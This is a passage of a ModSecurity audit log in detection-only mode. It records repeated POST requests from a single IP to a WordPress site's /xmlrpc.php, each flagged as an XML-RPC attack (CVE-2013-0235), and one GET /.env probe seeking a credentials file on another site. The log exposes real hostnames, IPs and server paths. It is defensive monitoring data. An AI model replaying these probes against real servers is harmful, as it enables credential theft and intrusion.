3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4TbD9o8tFLnaQ0S_4wbgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947244577919 1022283 (- - -) Stopwatch2: 1749947244577919 1022283; combined=2596, p1=425, p2=1729, p3=82, p4=56, p5=189, sr=95, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --639efa67-Z-- --fff9121c-A-- [15/Jun/2025:05:59:08.125925 +0530] aE4T08QgjKnP_-nTjoBnkAAAAAM 167.250.235.41 35706 127.0.0.1 7081 --fff9121c-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fff9121c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fff9121c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4T08QgjKnP_-nTjoBnkAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947347101969 1024020 (- - -) Stopwatch2: 1749947347101969 1024020; combined=2212, p1=395, p2=1442, p3=70, p4=49, p5=159, sr=114, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fff9121c-Z-- --c736796c-A-- [15/Jun/2025:06:00:56.242771 +0530] aE4UP8H4SeX80EzN5eWT0AAAAAs 167.250.235.41 35526 127.0.0.1 7081 --c736796c-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c736796c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --c736796c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4UP8H4SeX80EzN5eWT0AAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947455221946 1020903 (- - -) Stopwatch2: 1749947455221946 1020903; combined=2406, p1=370, p2=1558, p3=83, p4=56, p5=206, sr=109, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c736796c-Z-- --554bf060-A-- [15/Jun/2025:06:02:40.204827 +0530] aE4Up_BViRrxRfhQ2snhBgAAAAE 167.250.235.41 55626 127.0.0.1 7081 --554bf060-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --554bf060-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --554bf060-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4Up_BViRrxRfhQ2snhBgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947559142353 1062542 (- - -) Stopwatch2: 1749947559142353 1062542; combined=2739, p1=366, p2=1517, p3=68, p4=48, p5=412, sr=97, sw=328, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --554bf060-Z-- --26ef9d70-A-- [15/Jun/2025:06:04:16.506471 +0530] aE4VBx6N9C2vdY7GQBUuygAAAAY 167.250.235.41 44036 127.0.0.1 7081 --26ef9d70-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 687 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --26ef9d70-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --26ef9d70-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4VBx6N9C2vdY7GQBUuygAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947655461196 1045339 (- - -) Stopwatch2: 1749947655461196 1045339; combined=2050, p1=374, p2=1305, p3=63, p4=47, p5=163, sr=107, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --26ef9d70-Z-- --69737d59-A-- [15/Jun/2025:06:04:56.405043 +0530] aE4VLz9o8tFLnaQ0S_4w8gAAAAQ 3.237.5.136 47134 127.0.0.1 7081 --69737d59-B-- GET /.env HTTP/1.0 Host: www.sarvasya.com X-Real-IP: 3.237.5.136 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --69737d59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.sarvasya.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --69737d59-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.sarvasya.com"] [uri "/.env"] [unique_id "aE4VLz9o8tFLnaQ0S_4w8gAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarvasya.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947695471422 933701 (- - -) Stopwatch2: 1749947695471422 933701; combined=1642, p1=347, p2=1181, p3=0, p4=0, p5=113, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69737d59-Z-- --fc7bc17f-A-- [15/Jun/2025:06:06:00.607831 +0530] aE4Vbx6N9C2vdY7GQBUu6AAAAAY 167.250.235.41 44744 127.0.0.1 7081 --fc7bc17f-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fc7bc17f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --fc7bc17f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4Vbx6N9C2vdY7GQBUu6AAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947759525393 1082511 (- - -) Stopwatch2: 1749947759525393 1082511; combined=2213, p1=367, p2=1441, p3=67, p4=60, p5=173, sr=97, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fc7bc17f-Z-- --5d8b620d-A-- [15/Jun/2025:06:07:37.440885 +0530] aE4V0LdgU2RqPO-R9-XTKgAAAA0 167.250.235.41 34932 127.0.0.1 7081 --5d8b620d-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5d8b620d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --5d8b620d-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4V0LdgU2RqPO-R9-XTKgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947856364410 1076541 (- - -) Stopwatch2: 1749947856364410 1076541; combined=2492, p1=367, p2=1676, p3=91, p4=51, p5=191, sr=102, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d8b620d-Z-- --733d321e-A-- [15/Jun/2025:06:09:13.502489 +0530] aE4WMFIoq-7Cj_2-ZLTRQAAAAAA 167.250.235.41 42612 127.0.0.1 7081 --733d321e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --733d321e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --733d321e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4WMFIoq-7Cj_2-ZLTRQAAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749947952385465 1117088 (- - -) Stopwatch2: 1749947952385465 1117088; combined=2543, p1=473, p2=1707, p3=56, p4=46, p5=163, sr=125, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --733d321e-Z-- --3a854646-A-- [15/Jun/2025:06:10:42.184128 +0530] aE4WiRkoa9Lad8nP7KODKwAAABA 167.250.235.41 54234 127.0.0.1 7081 --3a854646-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3a854646-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --3a854646-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4WiRkoa9Lad8nP7KODKwAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948041161858 1022336 (- - -) Stopwatch2: 1749948041161858 1022336; combined=2399, p1=394, p2=1574, p3=62, p4=48, p5=193, sr=116, sw=128, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a854646-Z-- --7b7e014a-A-- [15/Jun/2025:06:12:07.298542 +0530] aE4W3hkoa9Lad8nP7KODRgAAABA 167.250.235.41 43508 127.0.0.1 7081 --7b7e014a-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7b7e014a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --7b7e014a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4W3hkoa9Lad8nP7KODRgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948126193725 1104882 (- - -) Stopwatch2: 1749948126193725 1104882; combined=2460, p1=373, p2=1627, p3=75, p4=85, p5=185, sr=101, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7b7e014a-Z-- --2c46e764-A-- [15/Jun/2025:06:13:28.226168 +0530] aE4XL_BViRrxRfhQ2snhzQAAAAE 167.250.235.41 49302 127.0.0.1 7081 --2c46e764-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2c46e764-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --2c46e764-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4XL_BViRrxRfhQ2snhzQAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948207178079 1048154 (- - -) Stopwatch2: 1749948207178079 1048154; combined=2291, p1=381, p2=1532, p3=57, p4=47, p5=168, sr=100, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2c46e764-Z-- --a41b973b-A-- [15/Jun/2025:06:14:43.190708 +0530] aE4XemydX8vZg3SgqNzKUAAAAAI 167.250.235.41 49494 127.0.0.1 7081 --a41b973b-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 685 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a41b973b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a41b973b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4XemydX8vZg3SgqNzKUAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948282150488 1040285 (- - -) Stopwatch2: 1749948282150488 1040285; combined=2650, p1=379, p2=1900, p3=66, p4=45, p5=161, sr=99, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a41b973b-Z-- --9764861a-A-- [15/Jun/2025:06:16:00.433752 +0530] aE4Xx2ydX8vZg3SgqNzKZAAAAAI 167.250.235.41 43642 127.0.0.1 7081 --9764861a-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9764861a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --9764861a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4Xx2ydX8vZg3SgqNzKZAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749948359424592 1009238 (- - -) Stopwatch2: 1749948359424592 1009238; combined=3010, p1=468, p2=2116, p3=68, p4=58, p5=188, sr=113, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9764861a-Z-- --6920fa76-A-- [15/Jun/2025:06:17:22.929191 +0530] aE4YGT9o8tFLnaQ0S_4x4wAAAAQ 167.250.235.41 54766 127.0.0.1 7081 --6920fa76-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 